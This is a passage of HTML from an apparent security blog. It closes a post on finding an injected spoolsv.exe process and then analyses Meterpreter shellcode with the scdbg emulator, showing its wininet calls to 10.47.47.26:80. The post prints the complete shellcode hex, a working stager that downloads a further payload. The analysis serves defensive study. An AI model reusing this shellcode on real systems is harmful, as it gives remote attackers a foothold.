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" /></div><div><br /></div><div>Inside that folder there's a file, one for each targeted system, in our case there's only one. We ran with the default output type so we have a CSV file and it's contents are as follows:</div><div><br /></div><div><div><font face="courier">"ProcessId","ProcessName","PSComputerName"</font></div><div><font face="courier">"1084","spoolsv","WINS2012R202"</font></div></div><div><br /></div><div>This means on our targeted endpoint, we had a single process that had this set of dlls loaded, our injected <font face="courier">spoolsv.exe</font> process.</div><div><br /></div><div>Happy hunting!</div><div><br /></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-87610456503310008242020-07-25T18:35:00.009-07:002020-07-25T19:57:56.896-07:00Analyzing an Instance of Meterpreter's ShellcodeIn my previous post on <a href="https://trustedsignal.blogspot.com/2020/07/meterpreters-migrate-detection-and.html" target="_blank">detecting and investigating Meterpreter's Migrate</a> functionality, I went down a rabbit hole on the initial PowerShell attack spawned by and Excel macro. In that payload was a bit of shellcode and I mentioned that I'd like to return to it at some point in the future for further analysis. I do not consider myself a reverse engineer, though I have dabbled over the years.<div><br /></div><div>What follows then is an amateur's ambling. If you are reading this and have insights you'd like to share, I'd love to receive them via the comments here, an <a href="https://twitter.com/davehull" target="_blank">@ mention or DM on Twitter</a>.</div><div><br /></div><div>Our shellcode from the previous post looked like this:</div><div><br /></div><div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 14px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">e8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d686e6574006877696e6954684c772607ffd531db5353535353683a5679a7ffd553536a0353536a50e8840000002f384b68383900506857899fc6ffd589c653680002608453535357535668eb552e3bffd5966a0a5f5353535356682d06187bffd585c0751668881300006844f035e0ffd54f75e168f0b5a256ffd56a4068001000006800004000536858a453e5ffd593535389e7576800200000535668129689e2ffd585c074cd8b0701c385c075e558c35fe87dffffff31302e34372e34372e323600</span></p></div><div><br /></div><div>Unsure how to proceed with analyzing this, I did a little searching online for things like "analyzing shellcode," "shellcode analysis," "shellcode reversing," etc. There are hundreds of thousands of hits, so no shortage of sites to go chase down.</div><div><br /></div><div>Here's where I landed. I had a <a href="https://github.com/fireeye/flare-vm" target="_blank">Flare VM</a> from a CTF I'd worked on some time back and I saw that it had recently been updated for the release of <a href="https://www.fireeye.com/blog/threat-research/2020/07/capa-automatically-identify-malware-capabilities.html" target="_blank">capa from Fireeye's Flare team</a>. I knew various posts about shellcode analysis referenced tools that are in the Flare VM, like scdbg, so I decided I'd spin up my old Flare VM and give it a go.</div><div><br /></div><div>Suffice to say, updating my Flare VM to the latest wasn't straightforward. There were some breaking changes in the upgrade, so I scrapped it and started over with a fresh Win10 system.</div><div><br /></div><div>Based on what I'd read elsewhere, my first inclination was to try <a href="http://sandsprite.com/blogs/index.php?uid=7&pid=152" target="_blank">scdbg.exe</a>, which is packaged as part of Flare VM.</div><div><br /></div><div><div><font face="courier"></font></div><span style="font-family: courier;">PS> scdbg.exe -f shellcode.bin</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 2000000</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><font face="courier"><br /></font><span style="font-family: courier;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier;">4010a8 InternetOpenA()</span><br /><span style="font-family: courier;">4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )</span><br /><span style="font-family: courier;">4010d9 HttpOpenRequestA(path: /8Kh89, )</span><br /><font face="courier"><br /></font><div style="text-align: left;"><font face="courier">Stepcount 2000001</font></div><div style="text-align: left;"><font face="courier"><br /></font></div><div><font face="courier"></font></div></div><div>This was immediately insightful. I now knew that the string of bytes imported functions from the wininet.dll referenced in the previous post. I could see the IP address and port that it was reaching out to; also seen in the Sysmon logs in the previous post.</div><div><br /></div><div>Having read this post from Didier Stevens, <a href="https://isc.sans.edu/forums/diary/Another+quickie+Using+scdbg+to+analyze+shellcode/24058/" target="_blank">Another Quickie: Using scdbg to analyze shellcode</a>, I recognized that there may be more to this shellcode than what was shown above as scdbg only emulates 2 million instructions by default. So, I increased the step count as shown below:</div><div><br /></div><div><div></div><span style="font-family: courier;">PS> scdbg.exe </span><font color="#ff0000" style="font-family: courier;">-s 3000000</font><span style="font-family: courier;"> -f shellcode.bin</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 3000000</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><font face="courier"><br /></font><span style="font-family: courier;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier;">4010a8 InternetOpenA()</span><br /><span style="font-family: courier;">4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )</span><br /><span style="font-family: courier;">4010d9 HttpOpenRequestA(path: /8Kh89, )</span><br /><span style="font-family: courier;">4010e9 HttpSendRequestA()</span><br /><span style="font-family: courier;">401117 VirtualAlloc(base=0 , sz=400000) = 600000</span><br /><font face="courier"><br /></font><div style="text-align: left;"><font face="courier">Stepcount 3000001</font></div><div style="text-align: left;"><font face="courier"><br /></font></div><div></div></div><div>How many steps are enough? I would guess it depends on the shellcode. In my experimentation with this sample, I didn't appear to glean additional information by increasing the step count beyond this. YMMV.</div><div><br /></div><div>Other options can be passed to <font face="courier">scdbg </font>and you should run it without passing it any arguments to see what the possibilities are. One can increase verbosity by passing <font face="courier">-v</font> and increase it more with <font face="courier">-vv</font> through <font face="courier">-vvvv</font>. A single <font face="courier">-v</font> will display disassembly:</div><div><br /></div><div><div><font face="courier" size="2"></font></div><font size="2"><span style="font-family: courier;">PS> scdbg.exe -v -s 20 -f shellcode.bin</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 20</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><span style="font-family: courier;">Verbosity: 1</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401000 E882000000 call 0x401087 step: 0</span><br /><span style="font-family: courier;">401087 5D pop ebp</span><br /><span style="font-family: courier;">401088 686E657400 push dword 0x74656e</span><br /><span style="font-family: courier;">40108d 6877696E69 push dword 0x696e6977</span><br /><span style="font-family: courier;">401092 54 push esp</span><br /><span style="font-family: courier;">401093 684C772607 push dword 0x726774c step: 5</span><br /><span style="font-family: courier;">401098 FFD5 call ebp</span><br /><span style="font-family: courier;">401005 60 pusha</span><br /><span style="font-family: courier;">401006 89E5 mov ebp,esp</span><br /><span style="font-family: courier;">401008 31C0 xor eax,eax</span><br /><span style="font-family: courier;">40100a 648B5030 mov edx,fs:[eax+0x30] step: 10</span><br /><span style="font-family: courier;">40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier;">401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier;">401014 8B7228 mov esi,[edx+0x28]</span><br /><span style="font-family: courier;">401017 0FB74A26 movzx ecx,[edx+0x26]</span><br /><span style="font-family: courier;">40101b 31FF xor edi,edi step: 15</span><br /><span style="font-family: courier;">40101d AC lodsb</span><br /><span style="font-family: courier;">40101e 3C61 cmp al,0x61</span><br /><span style="font-family: courier;">401020 7C02 jl 0x401024 vv</span><br /><span style="font-family: courier;">401022 2C20 sub al,0x20</span><br /><span style="font-family: courier;">401024 C1CF0D ror edi,0xd step: 20</span><br /><font face="courier"><br /></font></font><div style="text-align: left;"><font face="courier" size="2">Stepcount 21</font></div><div><font face="courier"></font></div></div><div><br /></div><div>Increasing the verbosity with <font face="courier">-vv</font> gives register values:</div><div><div></div><font size="1"><span style="font-family: courier;">PS> scdbg.exe -vv -s 8 -f shellcode.bin</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 8</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><span style="font-family: courier;">Verbosity: 2</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401000 E882000000 call 0x401087 step: 0 foffset: 0</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fe00 ebp=12fff0 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401087 5D pop ebp step: 1 foffset: 87</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdfc ebp=12fff0 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401088 686E657400 push dword 0x74656e step: 2 foffset: 88</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fe00 ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">40108d 6877696E69 push dword 0x696e6977 step: 3 foffset: 8d</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdfc ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401092 54 push esp step: 4 foffset: 92</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdf8 ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401093 684C772607 push dword 0x726774c step: 5 foffset: 93</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdf4 ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401098 FFD5 call ebp step: 6 foffset: 98</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdf0 ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401005 60 pusha step: 7 foffset: 5</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdec ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /></font><span style="font-family: courier;">401006 89E5 mov ebp,esp step: 8 foffset: 6</span><br /><span style="font-family: courier;">eax=0 ecx=0 edx=0 ebx=0</span><br /><span style="font-family: courier;">esp=12fdcc ebp=401005 esi=0 edi=0 EFL 0</span><br /><font face="courier"><br /><br /></font></font><div style="text-align: left;"><font face="courier" size="1">Stepcount 9</font></div><div></div></div><div><br /></div><div>Stepping up the verbosity again switches to an interactive mode where you're given the option to step through and select any of the options from this debug menu between instructions:</div><div><span style="font-family: courier; font-size: x-small;"><br /></span></div><div><div></div><span style="font-family: courier; font-size: x-small;">dbg></span><br /><span style="font-family: courier; font-size: x-small;"> ? - help, this help screen, h also works</span><br /><span style="font-family: courier; font-size: x-small;"> v - change verbosity (0-4)</span><br /><span style="font-family: courier; font-size: x-small;"> g - go - continue with v=0</span><br /><span style="font-family: courier; font-size: x-small;"> s - step, continues execution, ENTER also works</span><br /><span style="font-family: courier; font-size: x-small;"> c - reset step counter</span><br /><span style="font-family: courier; font-size: x-small;"> r - execute till return (v=0 recommended)</span><br /><span style="font-family: courier; font-size: x-small;"> u - unassembled x instructions at address (default eip)</span><br /><span style="font-family: courier; font-size: x-small;"> b - sets next free breakpoint (10 max)</span><br /><span style="font-family: courier; font-size: x-small;"> m - reset max step count (-1 = infinate)</span><br /><span style="font-family: courier; font-size: x-small;"> e - set eip (file offset or VA)</span><br /><span style="font-family: courier; font-size: x-small;"> w - dWord dump,(32bit ints) prompted for hex base addr and then size</span><br /><span style="font-family: courier; font-size: x-small;"> d - Dump Memory (hex dump) prompted for hex base addr and then size</span><br /><span style="font-family: courier; font-size: x-small;"> x - execute x steps (use with reset step count)</span><br /><span style="font-family: courier; font-size: x-small;"> t - set time delay (ms) for verbosity level 1/2</span><br /><span style="font-family: courier; font-size: x-small;"> k - show stack</span><br /><span style="font-family: courier; font-size: x-small;"> i - break at instruction (scans disasm for next string match)</span><br /><span style="font-family: courier; font-size: x-small;"> f - dereF registers (show any common api addresses in regs)</span><br /><span style="font-family: courier; font-size: x-small;"> j - show log of last 10 instructions executed</span><br /><span style="font-family: courier; font-size: x-small;"> o - step over</span><br /><span style="font-family: courier; font-size: x-small;"> ; - Set comment in IDA if .idasync active</span><br /><span style="font-family: courier; font-size: x-small;"> +/- - basic calculator to add or subtract 2 hex values</span><br /><span style="font-family: courier; font-size: x-small;"> .bl - list set breakpoints</span><br /><span style="font-family: courier; font-size: x-small;"> .bc - clear breakpoint</span><br /><span style="font-family: courier; font-size: x-small;"> .api - scan memory for api table</span><br /><span style="font-family: courier; font-size: x-small;"> .nop - nops out instruction at address (default eip)</span><br /><span style="font-family: courier; font-size: x-small;"> .seh - shows current value at fs[0]</span><br /><span style="font-family: courier; font-size: x-small;"> .segs - show values of segment registers</span><br /><span style="font-family: courier; font-size: x-small;"> .skip - skips current instruction and goes to next</span><br /><span style="font-family: courier; font-size: x-small;"> .reg - manually set register value</span><br /><span style="font-family: courier; font-size: x-small;"> .dllmap - show dll map</span><br /><span style="font-family: courier; font-size: x-small;"> .poke1 - write a single byte to memory</span><br /><span style="font-family: courier; font-size: x-small;"> .poke4 - write a 4 byte value to memory</span><br /><span style="font-family: courier; font-size: x-small;"> .lookup - get symbol for address</span><br /><span style="font-family: courier; font-size: x-small;"> .symbol - get address for symbol (special: peb,dllmap,fs0)</span><br /><span style="font-family: courier; font-size: x-small;"> .savemem - saves a memdump of specified range to file</span><br /><span style="font-family: courier; font-size: x-small;"> .idasync - connect IDASrvr plugin and sync view at step or break.</span><br /><span style="font-family: courier; font-size: x-small;"> .allocs - list memory allocations made</span><br /><div style="text-align: left;"><font face="courier" size="1"> q - quit</font></div><div></div></div><div><br /></div><div>There's also a <font face="courier">-r</font> option that will present a summary report at the end of the run. So the output becomes something like the following:</div><div><br /></div><div><div></div><span style="font-family: courier; font-size: small;">PS> scdbg.exe -r -s 2550000 -f shellcode.bin</span><br /><span style="font-family: courier; font-size: small;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier; font-size: small;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier; font-size: small;">Memory monitor enabled..</span><br /><span style="font-family: courier; font-size: small;">Initialization Complete..</span><br /><span style="font-family: courier; font-size: small;">Max Steps: 2550000</span><br /><span style="font-family: courier; font-size: small;">Using base offset: 0x401000</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier; font-size: small;">4010a8 InternetOpenA()</span><br /><span style="font-family: courier; font-size: small;">4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )</span><br /><span style="font-family: courier; font-size: small;">4010d9 HttpOpenRequestA(path: /8Kh89, )</span><br /><span style="font-family: courier; font-size: small;">4010e9 HttpSendRequestA()</span><br /><span style="font-family: courier; font-size: small;">401117 VirtualAlloc(base=0 , sz=400000) = 600000</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">Stepcount 2550001</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">Analysis report:</span><br /><span style="font-family: courier; font-size: small;"> Reads of Dll memory detected (use -mdll for details)</span><br /><span style="font-family: courier; font-size: small;"> Uses peb.InMemoryOrder List</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">Signatures Found: None</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">Memory Monitor Log:</span><br /><span style="font-family: courier; font-size: small;"> *PEB (fs30) accessed at 0x40100a</span><br /><div style="text-align: left;"><font face="courier" size="2"> peb.InMemoryOrderModuleList accessed at 0x401011</font></div><div></div></div><div><br /></div><div>In the <font face="courier">Analysis report</font> output were some things I dug into further. <font face="courier">scdbg </font>reports "<font face="courier">Reads of Dll memory detected</font>" followed by a nudge to use <font face="courier">-mdll</font> for details. Let's try that:</div><div><span style="font-family: courier; font-size: x-small;"><br /></span></div><div><div><font face="courier" size="2"></font></div><font size="2"><span style="font-family: courier;">PS> scdbg.exe -r -s 444650 -mdll -f shellcode.bin -nc</span><br /><span style="font-family: courier;">Loaded 296 bytes from file shellcode.bin</span><br /><span style="font-family: courier;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier;">Memory monitor enabled..</span><br /><span style="font-family: courier;">Memory monitor for dlls enabled..</span><br /><span style="font-family: courier;">Initialization Complete..</span><br /><span style="font-family: courier;">Max Steps: 444650</span><br /><span style="font-family: courier;">Using base offset: 0x401000</span><br /><font face="courier"><br /></font><span style="font-family: courier;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2f READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd30 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd31 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd32 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd33 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd34 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd35 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd27 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd28 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd29 READ</span><br /><span 